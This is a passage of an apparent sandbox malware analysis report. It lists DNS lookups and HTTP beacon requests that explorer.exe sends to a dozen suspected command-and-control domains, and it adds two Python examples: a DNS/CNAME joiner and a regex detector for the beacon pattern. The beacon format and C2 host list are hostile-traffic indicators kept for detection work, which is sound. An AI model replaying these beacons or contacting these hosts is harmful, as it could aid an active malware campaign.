                                                                         May 12, 2021 12:26:13.767909050 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:26:13.805685997 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:26:13.867902040 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:26:13.931727886 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:26:19.256853104 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:26:19.358293056 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:26:24.372886896 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:26:24.451124907 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3
                                                                         May 12, 2021 12:26:30.060688972 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
                                                                         May 12, 2021 12:26:30.125046015 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3

                                                                        DNS Queries

                                                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                         May 12, 2021 12:25:24.027081966 CEST | 192.168.2.3 | 8.8.8.8 | 0xa172 | Standard query (0) | www.skynetaccess.com | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:29.761121035 CEST | 192.168.2.3 | 8.8.8.8 | 0x4a6e | Standard query (0) | www.thepocket-onlinelesson.xyz | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:35.858010054 CEST | 192.168.2.3 | 8.8.8.8 | 0x66a3 | Standard query (0) | www.shirleyeluiz.com | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:46.166529894 CEST | 192.168.2.3 | 8.8.8.8 | 0x2fa3 | Standard query (0) | www.drisu-goalkeeping.com | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:51.342669964 CEST | 192.168.2.3 | 8.8.8.8 | 0x1f0b | Standard query (0) | www.rogegalmish.com | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:57.237812042 CEST | 192.168.2.3 | 8.8.8.8 | 0x7055 | Standard query (0) | www.webdomoupravitel.com | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:02.336038113 CEST | 192.168.2.3 | 8.8.8.8 | 0x6182 | Standard query (0) | www.best-cleaner.com | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:08.219162941 CEST | 192.168.2.3 | 8.8.8.8 | 0xb6c6 | Standard query (0) | www.4520oceanviewavenue.com | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:13.767909050 CEST | 192.168.2.3 | 8.8.8.8 | 0x609b | Standard query (0) | www.omfgphil.com | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:19.256853104 CEST | 192.168.2.3 | 8.8.8.8 | 0x3a0c | Standard query (0) | www.tracisolomon.xyz | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:24.372886896 CEST | 192.168.2.3 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.home-inland.com | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:30.060688972 CEST | 192.168.2.3 | 8.8.8.8 | 0xdff9 | Standard query (0) | www.boostcoachingonline.com | A (IP address) | IN (0x0001)

                                                                        DNS Answers

                                                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                         May 12, 2021 12:25:24.189014912 CEST | 8.8.8.8 | 192.168.2.3 | 0xa172 | No error (0) | www.skynetaccess.com | - | 52.128.23.153 | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:30.059087992 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a6e | No error (0) | www.thepocket-onlinelesson.xyz | - | 202.210.8.86 | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:36.019768000 CEST | 8.8.8.8 | 192.168.2.3 | 0x66a3 | No error (0) | www.shirleyeluiz.com | - | 34.95.69.141 | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:46.232381105 CEST | 8.8.8.8 | 192.168.2.3 | 0x2fa3 | No error (0) | www.drisu-goalkeeping.com | drisu-goalkeeping.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                         May 12, 2021 12:25:46.232381105 CEST | 8.8.8.8 | 192.168.2.3 | 0x2fa3 | No error (0) | drisu-goalkeeping.com | - | 81.169.145.162 | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:51.535154104 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f0b | No error (0) | www.rogegalmish.com | rogegalmish.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                         May 12, 2021 12:25:51.535154104 CEST | 8.8.8.8 | 192.168.2.3 | 0x1f0b | No error (0) | rogegalmish.com | - | 192.232.222.43 | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:25:57.300525904 CEST | 8.8.8.8 | 192.168.2.3 | 0x7055 | Name error (3) | www.webdomoupravitel.com | none | none | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:02.398396015 CEST | 8.8.8.8 | 192.168.2.3 | 0x6182 | No error (0) | www.best-cleaner.com | - | 156.252.96.189 | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:08.278670073 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6c6 | No error (0) | www.4520oceanviewavenue.com | 4520oceanviewavenue.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                         May 12, 2021 12:26:08.278670073 CEST | 8.8.8.8 | 192.168.2.3 | 0xb6c6 | No error (0) | 4520oceanviewavenue.com | - | 184.168.131.241 | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:13.931727886 CEST | 8.8.8.8 | 192.168.2.3 | 0x609b | No error (0) | www.omfgphil.com | - | 64.98.145.30 | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:19.358293056 CEST | 8.8.8.8 | 192.168.2.3 | 0x3a0c | Server failure (2) | www.tracisolomon.xyz | none | none | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:24.451124907 CEST | 8.8.8.8 | 192.168.2.3 | 0x2e78 | No error (0) | www.home-inland.com | home-inland.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                         May 12, 2021 12:26:24.451124907 CEST | 8.8.8.8 | 192.168.2.3 | 0x2e78 | No error (0) | home-inland.com | - | 81.88.52.88 | A (IP address) | IN (0x0001)
                                                                         May 12, 2021 12:26:30.125046015 CEST | 8.8.8.8 | 192.168.2.3 | 0xdff9 | No error (0) | www.boostcoachingonline.com | boostcoachingonline.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                         May 12, 2021 12:26:30.125046015 CEST | 8.8.8.8 | 192.168.2.3 | 0xdff9 | No error (0) | boostcoachingonline.com | - | 184.168.131.241 | A (IP address) | IN (0x0001)
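
The DNS Queries and DNS Answers tables above are only useful together: a query is matched to its answer by transaction ID, several answers arrive as a CNAME followed by the A record of the canonical name, and two of the lookups fail (0x7055 with a name error, 0x3a0c with a server failure). The Python below is an added example, not code from this report or from Joe Sandbox: it joins the two tables, follows each CNAME chain to the final address, separates the names that never resolved, and inverts the result so that names sharing one address stand out. The rows embedded in it are constructed from the tables above (a subset, with tab-separated columns and shortened timestamps so they can be split reliably).

```python
from collections import defaultdict

# Constructed sample rows, copied in shape from the DNS Queries and DNS Answers
# tables of this report. Columns are tab-separated.
# Query columns: timestamp, src, dst, txid, opcode, name, type
QUERIES = """\
12:25:24.027\t192.168.2.3\t8.8.8.8\t0xa172\tStandard query (0)\twww.skynetaccess.com\tA
12:25:46.166\t192.168.2.3\t8.8.8.8\t0x2fa3\tStandard query (0)\twww.drisu-goalkeeping.com\tA
12:25:57.237\t192.168.2.3\t8.8.8.8\t0x7055\tStandard query (0)\twww.webdomoupravitel.com\tA
12:26:08.219\t192.168.2.3\t8.8.8.8\t0xb6c6\tStandard query (0)\twww.4520oceanviewavenue.com\tA
12:26:19.256\t192.168.2.3\t8.8.8.8\t0x3a0c\tStandard query (0)\twww.tracisolomon.xyz\tA
12:26:30.060\t192.168.2.3\t8.8.8.8\t0xdff9\tStandard query (0)\twww.boostcoachingonline.com\tA
"""
# Answer columns: timestamp, src, dst, txid, rcode, name, cname, address, type
# (an empty cname or address cell is an empty field, as in the report's table)
ANSWERS = """\
12:25:24.189\t8.8.8.8\t192.168.2.3\t0xa172\tNo error (0)\twww.skynetaccess.com\t\t52.128.23.153\tA
12:25:46.232\t8.8.8.8\t192.168.2.3\t0x2fa3\tNo error (0)\twww.drisu-goalkeeping.com\tdrisu-goalkeeping.com\t\tCNAME
12:25:46.232\t8.8.8.8\t192.168.2.3\t0x2fa3\tNo error (0)\tdrisu-goalkeeping.com\t\t81.169.145.162\tA
12:25:57.300\t8.8.8.8\t192.168.2.3\t0x7055\tName error (3)\twww.webdomoupravitel.com\tnone\tnone\tA
12:26:08.278\t8.8.8.8\t192.168.2.3\t0xb6c6\tNo error (0)\twww.4520oceanviewavenue.com\t4520oceanviewavenue.com\t\tCNAME
12:26:08.278\t8.8.8.8\t192.168.2.3\t0xb6c6\tNo error (0)\t4520oceanviewavenue.com\t\t184.168.131.241\tA
12:26:19.358\t8.8.8.8\t192.168.2.3\t0x3a0c\tServer failure (2)\twww.tracisolomon.xyz\tnone\tnone\tA
12:26:30.125\t8.8.8.8\t192.168.2.3\t0xdff9\tNo error (0)\twww.boostcoachingonline.com\tboostcoachingonline.com\t\tCNAME
12:26:30.125\t8.8.8.8\t192.168.2.3\t0xdff9\tNo error (0)\tboostcoachingonline.com\t\t184.168.131.241\tA
"""


def parse_queries(text):
    """Map transaction ID -> queried name (insertion order is query order)."""
    out = {}
    for line in text.splitlines():
        _ts, _src, _dst, txid, _opcode, name, _rtype = line.split("\t")
        out[txid] = name
    return out


def parse_answers(text):
    """Map transaction ID -> reply code plus the list of resource records it carried."""
    out = defaultdict(lambda: {"rcode": None, "rrs": []})
    for line in text.splitlines():
        _ts, _src, _dst, txid, rcode, name, cname, addr, rtype = line.split("\t")
        out[txid]["rcode"] = rcode
        out[txid]["rrs"].append((name, cname, addr, rtype))
    return out


def resolve(queries, answers):
    """Return ({queried name: sorted A addresses}, [names that did not resolve]).

    The CNAME chain is followed from the queried name to the canonical name that
    owns the A record; the walk is bounded so a looping chain cannot hang it."""
    resolved, failed = {}, []
    for txid, qname in queries.items():
        ans = answers.get(txid)
        if ans is None or not ans["rcode"].startswith("No error"):
            failed.append(qname)           # NXDOMAIN, SERVFAIL or no answer at all
            continue
        cname_of = {n: c for n, c, _a, t in ans["rrs"] if t == "CNAME"}
        a_of = defaultdict(set)
        for n, _c, a, t in ans["rrs"]:
            if t == "A":
                a_of[n].add(a)
        name, seen = qname, set()
        while name in cname_of and name not in seen:
            seen.add(name)
            name = cname_of[name]
        if a_of[name]:
            resolved[qname] = sorted(a_of[name])
        else:
            failed.append(qname)           # NOERROR but no usable A record
    return resolved, failed


def shared_hosts(resolved):
    """Invert name -> addresses and keep only addresses serving more than one name."""
    by_ip = defaultdict(list)
    for name, ips in resolved.items():
        for ip in ips:
            by_ip[ip].append(name)
    return {ip: sorted(names) for ip, names in by_ip.items() if len(names) > 1}


if __name__ == "__main__":
    res, bad = resolve(parse_queries(QUERIES), parse_answers(ANSWERS))
    for name, ips in res.items():
        print(f"{name:32s} -> {', '.join(ips)}")
    print("unresolved:", bad)
    print("shared:", shared_hosts(res))
```

Run against the rows above, the join puts www.4520oceanviewavenue.com and www.boostcoachingonline.com on the same address, 184.168.131.241, which is also the destination of the TCP packets at 12:26:30 at the top of this section; the two failed names never appear in the HTTP sessions that follow. Grouping by final address rather than by queried name is what makes a shared back end visible across a list of otherwise unrelated domains.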

                                                                        HTTP Request Dependency Graph

                                                                        • www.skynetaccess.com
                                                                        • www.thepocket-onlinelesson.xyz
                                                                        • www.shirleyeluiz.com
                                                                        • www.drisu-goalkeeping.com
                                                                        • www.rogegalmish.com
                                                                        • www.best-cleaner.com
                                                                        • www.4520oceanviewavenue.com
                                                                        • www.omfgphil.com
                                                                        • www.boostcoachingonline.com

                                                                        HTTP Packets

                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                         0 | 192.168.2.3 | 49728 | 52.128.23.153 | 80 | C:\Windows\explorer.exe
                                                                         Timestamp | kBytes transferred | Direction | Data
                                                                         May 12, 2021 12:25:24.565185070 CEST | 1282 | OUT | GET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1
                                                                        Host: www.skynetaccess.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                         May 12, 2021 12:25:24.747936010 CEST | 1282 | IN | HTTP/1.1 463
                                                                        Server: nginx
                                                                        Date: Wed, 12 May 2021 10:25:24 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 8915
                                                                        Connection: close
                                                                        ETag: "5e52ceb0-22d3"
                                                                        X-DIS-Request-ID: e8467c834b8474c3c6b18d0d2ca7da5e
                                                                        Set-Cookie: dis-remote-addr=84.17.52.78
                                                                        Set-Cookie: dis-timestamp=2021-05-12T03:25:24-07:00
                                                                        Set-Cookie: dis-request-id=e8467c834b8474c3c6b18d0d2ca7da5e
                                                                        X-Frame-Options: sameorigin


                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                         1 | 192.168.2.3 | 49730 | 202.210.8.86 | 80 | C:\Windows\explorer.exe
                                                                         Timestamp | kBytes transferred | Direction | Data
                                                                         May 12, 2021 12:25:30.334672928 CEST | 1298 | OUT | GET /a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- HTTP/1.1
                                                                        Host: www.thepocket-onlinelesson.xyz
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                         May 12, 2021 12:25:32.124258041 CEST | 1299 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 12 May 2021 10:25:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://thepocket-onlinelesson.xyz/a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl-


                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                         2 | 192.168.2.3 | 49731 | 34.95.69.141 | 80 | C:\Windows\explorer.exe
                                                                         Timestamp | kBytes transferred | Direction | Data
                                                                         May 12, 2021 12:25:36.062501907 CEST | 1300 | OUT | GET /a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- HTTP/1.1
                                                                        Host: www.shirleyeluiz.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                         May 12, 2021 12:25:36.103701115 CEST | 1303 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Cache-Control: private
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Referrer-Policy: no-referrer
                                                                        Location: https://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl-
                                                                        Content-Length: 319
                                                                        Date: Wed, 12 May 2021 10:25:36 GMT
                                                                        Connection: close
                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 69 72 6c 65 79 65 6c 75 69 7a 2e 63 6f 6d 2f 61 38 73 69 2f 3f 4e 5a 62 3d 70 4d 34 41 39 79 39 73 32 66 51 4f 54 36 4d 73 65 4c 5a 36 44 31 6e 4a 70 33 5a 6f 58 69 31 44 49 7a 38 48 52 45 4b 73 37 6c 57 4b 6f 32 72 43 66 6b 33 59 42 43 57 6b 31 4c 62 77 58 6a 6b 48 73 65 51 2f 26 61 6d 70 3b 32 64 4e 44 3d 47 56 54 6c 2d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&amp;2dND=GVTl-">here</A>.</BODY></HTML>


                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                         3 | 192.168.2.3 | 49738 | 81.169.145.162 | 80 | C:\Windows\explorer.exe
                                                                         Timestamp | kBytes transferred | Direction | Data
                                                                         May 12, 2021 12:25:46.276973963 CEST | 5546 | OUT | GET /a8si/?NZb=ilDJZobCAoASZPKEjr+h2GJPzQZtXgxPn5qCqJ2imUF6WWwra1RdIaAgDcyp8aYyL3aO&2dND=GVTl- HTTP/1.1
                                                                        Host: www.drisu-goalkeeping.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                         May 12, 2021 12:25:46.322741985 CEST | 5547 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 12 May 2021 10:25:46 GMT
                                                                        Server: Apache/2.4.46 (Unix)
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                         4 | 192.168.2.3 | 49739 | 192.232.222.43 | 80 | C:\Windows\explorer.exe
                                                                         Timestamp | kBytes transferred | Direction | Data
                                                                         May 12, 2021 12:25:51.724770069 CEST | 5548 | OUT | GET /a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- HTTP/1.1
                                                                        Host: www.rogegalmish.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                         May 12, 2021 12:25:53.418782949 CEST | 5549 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Wed, 12 May 2021 10:25:53 GMT
                                                                        Server: nginx/1.19.10
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 0
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: https://www.rogegalmish.com/a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl-
                                                                        X-Server-Cache: true
                                                                        X-Proxy-Cache: MISS


                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                         5 | 192.168.2.3 | 49740 | 156.252.96.189 | 80 | C:\Windows\explorer.exe
                                                                         Timestamp | kBytes transferred | Direction | Data
                                                                         May 12, 2021 12:26:02.702056885 CEST | 5550 | OUT | GET /a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- HTTP/1.1
                                                                        Host: www.best-cleaner.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                         May 12, 2021 12:26:03.283816099 CEST | 5551 | IN | HTTP/1.1 302 Moved Temporarily
                                                                        Server: nginx/1.16.1
                                                                        Date: Wed, 12 May 2021 10:26:03 GMT
                                                                        Content-Type: text/html; charset=gbk
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        X-Powered-By: PHP/5.6.40
                                                                        Set-Cookie: ASP.NET_SessionId=umxa4r1wpqvtit5wadtbqazl; path=/; HttpOnly; SameSite=Lax
                                                                        Location: /404.html
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0
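
Every OUT request in the sessions above has the same target shape, GET /a8si/?NZb=<long base64-like value>&2dND=GVTl-, sent by C:\Windows\explorer.exe with Connection: close, and only the Host changes from session to session. A rule that fires on one such request is weak on its own; what distinguishes this traffic is the fixed directory and the fixed trailing parameter being replayed against a list of unrelated hosts from one process. The Python below is an added example, not code from this report or from Joe Sandbox: it matches the observed target shape with a regex and then correlates matches across hosts. The sample requests are constructed from sessions 0 to 3 plus two made-up benign requests; the hosts news.example.com and cdn.example.com, the regex and its length thresholds are assumptions drawn from these sessions, not a published signature.

```python
import re
from collections import defaultdict

# Constructed sample of (process, Host header, request line) triples. The first four are
# the OUT requests of sessions 0 to 3 in this report; the last two are made-up benign
# requests to hypothetical hosts that must not be flagged.
REQUESTS = [
    ("C:\\Windows\\explorer.exe", "www.skynetaccess.com",
     "GET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1"),
    ("C:\\Windows\\explorer.exe", "www.thepocket-onlinelesson.xyz",
     "GET /a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- HTTP/1.1"),
    ("C:\\Windows\\explorer.exe", "www.shirleyeluiz.com",
     "GET /a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- HTTP/1.1"),
    ("C:\\Windows\\explorer.exe", "www.drisu-goalkeeping.com",
     "GET /a8si/?NZb=ilDJZobCAoASZPKEjr+h2GJPzQZtXgxPn5qCqJ2imUF6WWwra1RdIaAgDcyp8aYyL3aO&2dND=GVTl- HTTP/1.1"),
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "news.example.com",   # constructed benign
     "GET /news/?page=2&sort=new HTTP/1.1"),
    ("C:\\Windows\\explorer.exe", "cdn.example.com",                           # constructed benign
     "GET /a8si/?id=12345&v=1 HTTP/1.1"),
]

# Shape of the observed beacon target: a four-character directory, one short key carrying a
# long base64-like value, then a second short key with a short static value. The character
# classes and the 40-character minimum are heuristics taken from the requests in this report.
BEACON_RE = re.compile(
    r"^/(?P<dir>[A-Za-z0-9]{4})/\?"
    r"(?P<k1>[A-Za-z0-9]{2,4})=(?P<v1>[A-Za-z0-9+/]{40,}=*)"
    r"&(?P<k2>[A-Za-z0-9]{2,4})=(?P<v2>[A-Za-z0-9_-]{1,8})$"
)


def match_beacon(request_line):
    """Return the regex groups when a GET request target has the beacon shape, else None."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return None
    m = BEACON_RE.match(parts[1])
    return m.groupdict() if m else None


def correlate(requests, min_hosts=3):
    """Group beacon-shaped requests by the parts that stay constant across sessions
    (process, directory, first key, static second parameter) and keep only groups
    that reached at least min_hosts distinct Host values.

    Returns {(process, dir, k1, "k2=v2"): sorted list of hosts}."""
    groups = defaultdict(set)
    for process, host, line in requests:
        g = match_beacon(line)
        if g:
            groups[(process, g["dir"], g["k1"], g["k2"] + "=" + g["v2"])].add(host)
    return {key: sorted(hosts) for key, hosts in groups.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    for key, hosts in correlate(REQUESTS).items():
        process, directory, k1, static = key
        print(f"{process} -> /{directory}/ ?{k1}=... &{static} against {len(hosts)} hosts:")
        for h in hosts:
            print("   ", h)
```

The two benign requests show why the single-request check is kept loose but the decision is made on the group: /a8si/?id=12345&v=1 from explorer.exe shares the directory but not the long encoded value, and is dropped by the regex, while a genuine match on one host would still not reach min_hosts. In a real pipeline the grouping key would also carry a time window, since the sessions above span about six minutes.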


                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                         6 | 192.168.2.3 | 49741 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                                                         Timestamp | kBytes transferred | Direction | Data
                                                                         May 12, 2021 12:26:08.493067980 CEST | 5552 | OUT | GET /a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- HTTP/1.1
                                                                        Host: www.4520oceanviewavenue.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
May 12, 2021 12:26:08.756416082 CEST    5553                  IN           HTTP/1.1 200 OK
                                                                        Server: nginx/1.16.1
                                                                        Date: Wed, 12 May 2021 10:26:08 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 3c 2f 74 69 74 6c 65 3e 20 20 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 75 72 20 49 6d 61 67 69 6e 67 20 56 69 72 74 75 61 6c 20 54 6f 75 72 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 2c 2a 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 0a 20 20 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 6f 75 72 73 2e 74 6f 75 72 69 6d 61 67 69 6e 67 2e 63 6f 6d 2f 73 2f 69 64 78 2f 35 37 37 30 33 33 3f 4e 5a 62 3d 4f 33 6f 31 55 2b 71 38 6f 4d 57 30 41 34 30 51 75 4d 34 6b 7a 5a 46 7a 75 76 47 5a 78 31 38 46 32 4a 31 6a 4f 6a 30 48 73 46 75 65 59 69 47 33 64 49 70 74 48 70 68 6f 52 5a 4a 79 2f 2f 66 4f 46 65 68 41 26 61 6d 70 3b 32 64 4e 44 3d 47 56 54 6c 2d 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 2f 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
